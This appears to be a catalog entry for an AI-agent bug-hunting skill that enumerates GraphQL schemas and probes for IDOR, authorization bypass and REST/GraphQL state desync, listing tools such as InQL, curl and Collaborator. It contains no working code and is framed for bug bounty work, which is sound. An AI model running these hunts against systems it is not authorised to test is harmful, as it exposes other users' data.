Hunt GraphQL authorization flaws
hunt-graphqlskillsetup L1★1,791
elementalsouls/Claude-BugHunter ↗What it does
Enumerate GraphQL schema and hunt IDOR, authz-bypass, cross-API desync
Best for
Bug bounty hunters on platform APIs (GitHub, Shopify, Stripe tier) where GraphQL mutations interact with REST APIs.
Inputs
- · target /graphql endpoint
- · GraphQL mutation names (from introspection)
Outputs
- · service catalog
- · method/message schemas
- · IDOR proof (accessed another user's data)
- · authz bypass (method callable without auth)
- · desync chain (REST vs GraphQL state mismatch)
Requires
- · InQL (Burp extension)
- · graphql-voyager
- · curl
- · Collaborator (for SSRF OOB)
Preconditions
- · GraphQL endpoint exists
- · server reflection enabled OR method names enumerable
Failure modes
- · introspection disabled
- · strong authz per field
- · mutations require non-bypassable tokens
Trust signals
- · Built from 12 public bug bounty reports
- · Includes crown-jewel pattern: privilege revoked in REST but re-asserted in GraphQL
- · Covers race-condition desync testing methodology